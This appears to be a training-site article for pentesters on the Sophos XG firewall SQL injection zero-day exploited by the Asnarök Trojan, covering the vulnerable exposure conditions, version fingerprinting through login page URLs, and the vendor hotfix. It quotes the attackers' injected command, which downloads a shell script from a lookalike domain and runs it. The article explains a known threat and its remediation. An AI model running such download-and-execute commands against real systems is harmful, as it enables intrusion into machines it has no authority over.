Zero-day Sophos XG firewall vulnerability: an exploit guide for pentesters
The Sophos XG firewall vulnerability
The Sophos XG Firewall recently had a publicly-reported zero-day vulnerability. The vulnerability in question was an SQL injection vulnerability that, if exploited, would allow code execution.
This SQL injection vulnerability was reported to the vendor after it was being exploited in the wild. The vendor received a report from a customer that the Sophos XG Firewall Management interface contained a suspicious value. Further investigation revealed that the SQL injection vulnerability was exploited to execute a chain of Linux shell scripts that eventually downloaded and executed a copy of the Asnarök Trojan.
FREE role-guided training plans
A remote server hosting the lookalike domain sophosfirewallupdate.com performed the initial command injection. Additional malicious IP addresses and domains (including sophosproductupdate.com) were used during the attack to pull malware droppers and modules and to perform the exfiltration of sensitive data.
Exploiting the vulnerability
Exploitation of the vulnerability in a target environment is a two-step process. A Sophos XG firewall is only exploitable if it is running a vulnerable version of the firmware and has one of several network configuration issues. If these conditions are met, the SQL injection vulnerability can be exploited.
Identifying vulnerable systems
For a system to be vulnerable to exploitation, a few preconditions must be met. These include a misconfiguration of the organization’s network and the use of a vulnerable version of the Sophos XG firewall firmware.
The SQL injection vulnerability in the Sophos XG firewall can be accessed in a few different ways. Vulnerable firewalls exposed one of the following on the WAN zone:
- Administration interface (HTTPS admin interface)
- User portal
- Firewall service (e.g., SSL VPN) that shares a port with either of the previous
If a Sophos XG firewall has any of these three configuration errors, then it may be vulnerable to exploitation. The other requirement is that the firewall’s owner has not installed the hotfix issued by Sophos.
The simplest way to determine this is to check the Control Center of the firewall. The alert message regarding the hotfix will not go away even after it has been applied (as shown below).
Otherwise, examine the HTML of the exposed user (https://<IP>:<Port>/userportal/webpages/myaccount/login.jsp) or admin (https://<IP>:<Port>/webconsole/webpages/login.jsp) interface. The reference to external resources (such as style sheets) will include a version number as shown above. Comparing this version number to vulnerable versions will reveal if the vulnerability is exploitable.
Exploiting the vulnerability
The vulnerability in the Sophos XG firewall is a pre-authentication vulnerability in the user or admin interface. It can be exploited using standard SQL injection techniques in the login fields.
The injected input can allow an attacker to execute malicious code on the system. For example, the Asnarök attackers used the following command:
||cd /tmp/ && wget hxxps://sophosfirewallupdate[.]com/sp/install.sh -O /tmp/x.sh && chmod 777 /tmp/x.sh && sh /tmp/x.sh||
This command downloaded a malicious script from a lookalike domain, renamed it, made it executable and ran it in an instance of the shell.
Securing XG Firewall against exploitation
Sophos previously issued a hotfix for the vulnerability that should be automatically installed if a system is configured for automatic updates. If not, the vendor provides instructions on how to manually install the update.
Installation of an update only closes the vulnerability. It does not remediate a successful attack. The alert message in the firewall control center will state whether or not the vulnerability has been successfully exploited. If so, additional steps are necessary for remediation.
FREE role-guided training plans
Sources
- Fixing SQL injection vulnerability and malicious code execution in XG Firewall/SFOS, Sophos Community
- Zero-day flaw in Sophos XG Firewall exploited in attacks, TechTarget
- “Asnarök” Trojan targets firewalls, Sophos News
- CVE-2020-12271: Sophos XG Firewall Pre-Auth SQL Injection Vulnerability Remediation Guidance and Exposure Overview, Rapid7 Blog
In this Series
- Zero-day Sophos XG firewall vulnerability: an exploit guide for pentesters
- Intelligence-led pentesting and the evolution of Red Team operations
- Red Teaming: Taking advantage of Certify to attack AD networks
- How ethical hacking and pentesting is changing in 2022
- Ransomware penetration testing: Verifying your ransomware readiness
- Red Teaming: Main tools for wireless penetration tests
- Fundamentals of IoT firmware reverse engineering
- Red Teaming: Top tools and gadgets for physical assessments
- Red teaming: Initial access and foothold
- Top tools for red teaming
- What is penetration testing, anyway?
- Red Teaming: Persistence Techniques
- Red Teaming: Credential dumping techniques
- Top 6 bug bounty programs for cybersecurity professionals
- Tunneling and port forwarding tools used during red teaming assessments
- SigintOS: Signal Intelligence via a single graphical interface
- Top tools for mobile android assessments
- Top tools for mobile iOS assessments
- Red Team: C2 frameworks for pentesting
- Inside 1,602 pentests: Common vulnerabilities, findings and fixes
- Red teaming tutorial: Active directory pentesting approach and tools
- Red Team tutorial: A walkthrough on memory injection techniques
- Python for active defense: Monitoring
- Python for active defense: Network
- Python for active defense: Decoys
- How to write a port scanner in Python in 5 minutes: Example and walkthrough
- Using Python for MITRE ATT&CK and data encrypted for impact
- Explore Python for MITRE ATT&CK exfiltration and non-application layer protocol
- Explore Python for MITRE ATT&CK command-and-control
- Explore Python for MITRE ATT&CK email collection and clipboard data
- Explore Python for MITRE ATT&CK lateral movement and remote services
- Explore Python for MITRE ATT&CK account and directory discovery
- Explore Python for MITRE ATT&CK credential access and network sniffing
- Top 10 security tools for bug bounty hunters
- Kali Linux: Top 5 tools for password attacks
- Kali Linux: Top 5 tools for post exploitation
- Kali Linux: Top 5 tools for database security assessments
- Kali Linux: Top 5 tools for information gathering
- Kali Linux: Top 5 tools for sniffing and spoofing
- Kali Linux: Top 8 tools for wireless attacks
- Kali Linux: Top 5 tools for penetration testing reporting
- Kali Linux overview: 14 uses for digital forensics and pentesting
- Top 19 Kali Linux tools for vulnerability assessments
- Explore Python for MITRE ATT&CK persistence
- Explore Python for MITRE ATT&CK defense evasion
- Explore Python for MITRE ATT&CK privilege escalation
- Explore Python for MITRE ATT&CK initial access
- Top 18 tools for vulnerability exploitation in Kali Linux
- Explore Python for MITRE PRE-ATT&CK, network scanning and Scapy
- Kali Linux: Top 5 tools for social engineering
- Basic snort rules syntax and usage [updated 2021]
Get certified and advance your career
- Exam Pass Guarantee
- Live instruction
- CompTIA, ISACA, (ISC)², Cisco, Microsoft and more!
Penetration testing
Intelligence-led pentesting and the evolution of Red Team operations
Penetration testing
Red Teaming: Taking advantage of Certify to attack AD networks
Penetration testing
Penetration testing
Ransomware penetration testing: Verifying your ransomware readiness